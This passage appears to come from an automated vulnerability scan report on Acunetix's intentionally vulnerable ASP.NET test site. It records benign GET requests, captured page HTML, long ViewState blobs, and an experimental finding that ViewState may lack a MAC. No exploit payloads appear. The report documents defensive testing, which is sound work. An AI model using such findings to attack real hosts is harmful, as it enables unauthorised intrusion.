W5ldGl4LmNvbS92dWxuZXJhYmlsaXR5LXNjYW5uZXIvYWN1bmV0aXgtaW50ZWdyYXRpb25zLz5pc3N1ZSB0cmFja2VyIGludGVncmF0aW9uPC9hPiBhbmQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vdnVsbmVyYWJpbGl0eS1zY2FubmVyL3Z1bG5lcmFiaWxpdHktbWFuYWdlbWVudC1yZWd1bGF0b3J5LWNvbXBsaWFuY2UvPmNvbXByZWhlbnNpdmUgcmVwb3J0aW5nPC9hPi48L3A+ICAgICA8cD48c3Ryb25nPk1vcmUgRmVhdHVyZXMgaW4gdGhlIExhdGVzdCBCdWlsZDwvc3Ryb25nPjwvcD4gICAgIDxwPk9wZW5WQVMgaW50ZWdyYXRpb24gaXMgaW50cm9kdWNlZCBhcyBwYXJ0IG9mIHRoZSBsYXRlc3QgQWN1bmV0aXggdmVyc2lvbiAxMiBidWlsZCAoPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vYmxvZy9yZWxlYXNlcy9uZXctYnVpbGQtbmV0d29yay1zY2FubmluZy1pbnRlZ3JhdGlvbi1pcHY2LXN1cHBvcnQvPmJ1aWxkIDEyLjAuMTkwNTE1MTQ5PC9hPikuIFRoaXMgbmV3IGJ1aWxkIGFsc28gaW5jbHVkZXM6PC9wPiAgICAgPHA+LSBTdXBwb3J0IGZvciBJUHY2PGJyIC8+ICAgICAtIEltcHJvdmVkIHVzYWdlIG9mIG1hY2hpbmUgcmVzb3VyY2VzPGJyIC8+ICAgICAtIEFkZGVkIHN1cHBvcnQgZm9yIFNlbGVuaXVtIHNjcmlwdHMgYXMgaW1wb3J0IGZpbGVzPGJyIC8+ICAgICAtIE11bHRpcGxlIHZ1bG5lcmFiaWxpdHkgY2hlY2tzIGZvciBTQVA8YnIgLz4gICAgIC0gVW5hdXRob3JpemVkIGFjY2VzcyBkZXRlY3Rpb24gZm9yIFJlZGlzIGFuZCBNZW1jYWNoZWQ8YnIgLz4gICAgIC0gU291cmNlIGNvZGUgZGlzY2xvc3VyZSBmb3IgUnVieSBhbmQgUHl0aG9uPC9wPiAgICAgPHA+VGhlIG5ldyBidWlsZCBhbHNvIGluY2x1ZGVzIGEgbnVtYmVyIG9mIHVwZGF0ZXMgYW5kIGZpeGVzLCBhbGwgb2Ygd2hpY2ggYXJlIGF2YWlsYWJsZSBmb3IgYm90aCBXaW5kb3dzIGFuZCBMaW51eC4gTW9yZSBpbmZvcm1hdGlvbiBjYW4gYmUgZm91bmQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vYmxvZy9yZWxlYXNlcy9uZXctYnVpbGQtbmV0d29yay1zY2FubmluZy1pbnRlZ3JhdGlvbi1pcHY2LXN1cHBvcnQvPmhlcmU8L2E+LjwvcD4gICAgIDxwPkdldCBhIGRlbW8gb2YgdGhlIHByb2R1Y3QgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vbmV0d29yay1zZWN1cml0eS1zY2FubmVyLz5oZXJlPC9hPi48L3A+ICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc+PC9wPiAgICAgPHA+VXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD4gICAgIDxwPjxzdHJvbmc+QWN1bmV0aXgsIHRoZSBDb21wYW55PC9zdHJvbmc+PC9wPiAgICAgPHA+Rm91bmRlZCBpbiAyMDA0IHRvIGNvbWJhdCB0aGUgYWxhcm1pbmcgcmlzZSBpbiB3ZWIgYXBwbGljYXRpb24gYXR0YWNrcywgQWN1bmV0aXggaXMgdGhlIG1hcmtldCBsZWFkZXIgYW5kIGEgcGlvbmVlciBpbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHNlY3VyaXR5IHRlY2hub2xvZ3kuIEZyb20gaW5kaXZpZHVhbCBjb25zdWx0YW50cyB0byBlbnRlcnByaXNlcywgcGVuZXRyYXRpb24gdGVzdGVycyBhbmQgc2VjdXJpdHkgZXhwZXJ0cyBnbG9iYWxseSBkZXBlbmQgb24gQWN1bmV0aXggcHJvZHVjdHMgYW5kIHRlY2hub2xvZ2llcy4gSXQgaXMgdGhlIHRvb2wgb2YgY2hvaWNlIGZvciBtYW55IGN1c3RvbWVycyBhY3Jvc3Mgc2VjdG9ycywgaW5jbHVkaW5nIEdvdmVybm1lbnQsIE1pbGl0YXJ5LCBFZHVjYXRpb24sIFRlbGVjb21tdW5pY2F0aW9ucywgQmFua2luZywgRmluYW5jZSwgYW5kIEUtQ29tbWVyY2Ugc2VjdG9ycyBhcyB3ZWxsIGFzIG1hbnkgRm9ydHVuZSA1MDAgY29tcGFuaWVzIHN1Y2ggYXMgdGhlIFBlbnRhZ29uLCBIYXJwZXIgQ29sbGlucywgRGlzbmV5LCBBZG9iZSwgYW5kIG1hbnkgbW9yZS48L3A+ZAIJDw8WAh4LTmF2aWdhdGVVcmwFEkNvbW1lbnRzLmFzcHg/aWQ9MGRkAgsPFgIeA3NyYwUMYWRzL2RlZi5odG1sZGTxtiNRXSWMk2xH7U3KJPX1k9tDKQ==" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLWjL6iDQK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q+dfic04fJFrwdgOeBd3JBjK63E5g==" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD vAlign="top">
          						<DIV id="divNewsDate" class="NewsDate">posted by <strong>admin                    </strong>5/16/2019 12:32:30 PM</DIV>
          						<DIV id="divNewsTitle" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</DIV>
          						<DIV id="divNewsLong" class="NewsLong"><p><strong>London, UK</strong> &ndash; <strong>May 2019</strong> &ndash; Acunetix, the pioneer in automated web application security software, has announced that all versions of the <a href=https://www.acunetix.com/vulnerability-scanner/>Acunetix Vulnerability Scanner</a> now support <a href=https://www.acunetix.com/vulnerability-scanner/network-security-scanner/>network security scanning</a>. Network security scans are possible thanks to the seamless integration of Acunetix with the powerful OpenVAS security solution. Until now, network security scanning functionality was available only in Acunetix Online.</p>     <p>&ldquo;No matter the size of your business, you use multiple security measures to alleviate different types of risks. Your security strategy must always include both web security scans and network security scans. And it makes it so much easier and much more efficient if you can do the two together using a single integrated tool,&rdquo; said Nicolas Sciberras, CTO.</p>     <p>There are many advantages of running network security scans in Acunetix. Having a single integrated dashboard with both web and network vulnerabilities gives the best possible risk visibility and saves a lot of time and effort. Network scans may also benefit from other Acunetix features, such as <a href=https://www.acunetix.com/vulnerability-scanner/acunetix-integrations/>issue tracker integration</a> and <a href=https://www.acunetix.com/vulnerability-scanner/vulnerability-management-regulatory-compliance/>comprehensive reporting</a>.</p>     <p><strong>More Features in the Latest Build</strong></p>     <p>OpenVAS integration is introduced as part of the latest Acunetix version 12 build (<a href=https://www.acunetix.com/blog/releases/new-build-network-scanning-integration-ipv6-support/>build 12.0.190515149</a>). This new build also includes:</p>     <p>- Support for IPv6<br />     - Improved usage of machine resources<br />     - Added support for Selenium scripts as import files<br />     - Multiple vulnerability checks for SAP<br />     - Unauthorized access detection for Redis and Memcached<br />     - Source code disclosure for Ruby and Python</p>     <p>The new build also includes a number of updates and fixes, all of which are available for both Windows and Linux. More information can be found <a href=https://www.acunetix.com/blog/releases/new-build-network-scanning-integration-ipv6-support/>here</a>.</p>     <p>Get a demo of the product <a href=https://www.acunetix.com/network-security-scanner/>here</a>.</p>     <p><strong>About Acunetix</strong></p>     <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise&rsquo;s ability to comprehensively manage, prioritize, and control vulnerability threats &ndash; ordered by business criticality.</p>     <p><strong>Acunetix, the Company</strong></p>     <p>Founded in 2004 to combat the alarming rise in web application attacks, Acunetix is the market leader and a pioneer in automated web application security technology. From individual consultants to enterprises, penetration testers and security experts globally depend on Acunetix products and technologies. It is the tool of choice for many customers across sectors, including Government, Military, Education, Telecommunications, Banking, Finance, and E-Commerce sectors as well as many Fortune 500 companies such as the Pentagon, Harper Collins, Disney, Adobe, and many more.</p></DIV>
          						<TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0">
          							<TR>
          								<TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD>
          							</TR>
          							<TR>
          								<TD class="Comment" vAlign="middle">
          									<a id="hlComments" href="Comments.aspx?id=0">Read user comments</a></TD>
          							</TR>
          							<TR>
          								<TD vAlign="top"><IMG src="images/comment-after.gif"></TD>
          							</TR>
          						</TABLE>
          						<center>
          						<iframe id="adsFrame" src="ads/def.html" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe>
          						</center>
          					</TD>
          					<TD vAlign="top" width="200" colSpan="2">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          
          					</TD>
          				</TR>
          				<TR>
          					<TD colSpan="3"></TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Solution

          Ensure the MAC is set for all pages on this website.

        10. GET http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=2
          Alert tags
          Alert description

          *** EXPERIMENTAL ***

          This website uses ASP.NET's Viewstate but maybe without any MAC.

          Request
          Request line and header section (342 bytes)
          GET http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=2 HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Referer: http://testaspnet.vulnweb.com
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (0 bytes)
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:18 GMT
          Content-Length: 30454
          
          
          Response body (30454 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>ReadNews</title>
          		<meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
          		<meta content="C#" name="CODE_LANGUAGE">
          		<meta content="JavaScript" name="vs_defaultClientScript">
          		<meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="ReadNews.aspx?NewsAd=ads%2fdef.html&amp;id=2" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNToyMiBBTWQCBQ8WAh8BBTxXZWIgYXR0YWNrcyAtIGNhbiB5b3VyIHdlYiBhcHBsaWNhdGlvbnMgd2l0aHN0YW5kIHRoZSBmb3JjZT9kAgcPFgIfAQWbODxwPjxzdHJvbmc+QWN1bmV0aXggY29tYmF0cyByaXNlIGluIHdlYiBhdHRhY2tzIHdpdGggQWN1bmV0aXggICAgICAgICAgICAgICAgICAgICAgICAgICAgV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAyIDwvc3Ryb25nPjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD4yMSBKdWx5IDIwMDUgLSA8c3Ryb25nPlN0YXJ0LXVwIGNvbXBhbnkgQWN1bmV0aXggcmVsZWFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjogYSB0b29sIHRvIGF1dG9tYXRpY2FsbHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXVkaXQgd2Vic2l0ZSBzZWN1cml0eS4gQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAgICAgICAgICAgICAgICAgICAgICAgICAgICAyIGNyYXdscyBhbiBlbnRpcmUgd2Vic2l0ZSwgbGF1bmNoZXMgcG9wdWxhciB3ZWIgYXR0YWNrcyAgICAgICAgICAgICAgICAgICAgICAgICAgICAoU1FMIEluamVjdGlvbiBldGMuKSBhbmQgaWRlbnRpZmllcyB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBuZWVkIHRvIGJlIGZpeGVkLjwvc3Ryb25nPiA8L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5TZWN1cmluZyB5b3VyIHdlYnNpdGUgc2hvdWxkIGJlIHlvdXIgbnVtYmVyIG9uZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjb25jZXJuPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgSGFja2VycyBhcmUgY29uY2VudHJhdGluZyB0aGVpciBlZmZvcnRzIG9uIHdlYi1iYXNlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBhcHBsaWNhdGlvbnMgLSA3NSUgb2YgY3liZXIgYXR0YWNrcyBhcmUgZG9uZSBhdCB0aGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGxldmVsLCBhIEdhcnRuZXIgR3JvdXAgc3R1ZHkgaGFzIHJldmVhbGVkLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBXZWIgYXBwbGljYXRpb25zIGFyZSBhY2Nlc3NpYmxlIDI0IGhvdXJzIGEgZGF5LCA3IGRheXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgYSB3ZWVrIGFuZCBjb250cm9sIHZhbHVhYmxlIGRhdGEgc3VjaCBhcyBjdXN0b21lciBpbmZvcm1hdGlvbiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgdHJhbnNhY3Rpb24gaW5mb3JtYXRpb24gYW5kIGV2ZW4gcHJvcHJpZXRhcnkgY29ycG9yYXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGEuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+NTAwLDAwMCBjdXN0b21lciBjcmVkaXQgY2FyZCBudW1iZXJzIG9idGFpbmVkIHZpYSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhIHdlYiBhdHRhY2s8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBXZWxsLWtub3duIHNpdGVzIHRoYXQgd2VyZSBvcGVuIHRvIHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGluY2x1ZGUgZmFzaGlvbiBsYWJlbCBHdWVzcyBhbmQgcGV0IHN1cHBseSByZXRhaWxlciAgICAgICAgICAgICAgICAgICAgICAgICAgICBQZXRDby5jb20gd2hvIHdlcmUgbm90b3Jpb3VzbHkgZm91bmQgdG8gYmUgdnVsbmVyYWJsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB0byB0aGUgU1FMIGluamVjdGlvbiB2dWxuZXJhYmlsaXR5IChKdW5lIDIwMDMpLiBUaGlzICAgICAgICAgICAgICAgICAgICAgICAgICAgIHJlc3VsdGVkIGluIFBldENvIGxlYXZpbmcgYXMgbWFueSBhcyA1MDAsMDAwIGNyZWRpdCAgICAgICAgICAgICAgICAgICAgICAgICAgICBjYXJkIG51bWJlcnMgb3BlbiB0byBhbnlvbmUgYWJsZSB0byBjb25zdHJ1Y3QgdGhpcyBzcGVjaWFsbHktY3JhZnRlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBVUkwuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+RmlyZXdhbGxzLCBTU0wgYW5kIGxvY2tlZC1kb3duIHNlcnZlcnMgYXJlIGZ1dGlsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBoYWNraW5nPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQW55IGRlZmVuc2UgYXQgbmV0d29yayBzZWN1cml0eSBsZXZlbCB3aWxsIHByb3ZpZGUgbm8gICAgICAgICAgICAgICAgICAgICAgICAgICAgcHJvdGVjdGlvbiBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzIHNpbmNlIHRoZXkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXJlIGxhdW5jaGVkIG9uIHBvcnQgODAgLSB3aGljaCBoYXMgdG8gcmVtYWluIG9wZW4uICAgICAgICAgICAgICAgICAgICAgICAgICAgIEluIGFkZGl0aW9uLCB3ZWIgYXBwbGljYXRpb25zIChjdXN0b21lciBhcmVhcywgc2hvcHBpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FydHMgZXRjLikgYXJlIG9mdGVuIHRhaWxvci1tYWRlLCBpbnZhcmlhYmx5IHRlc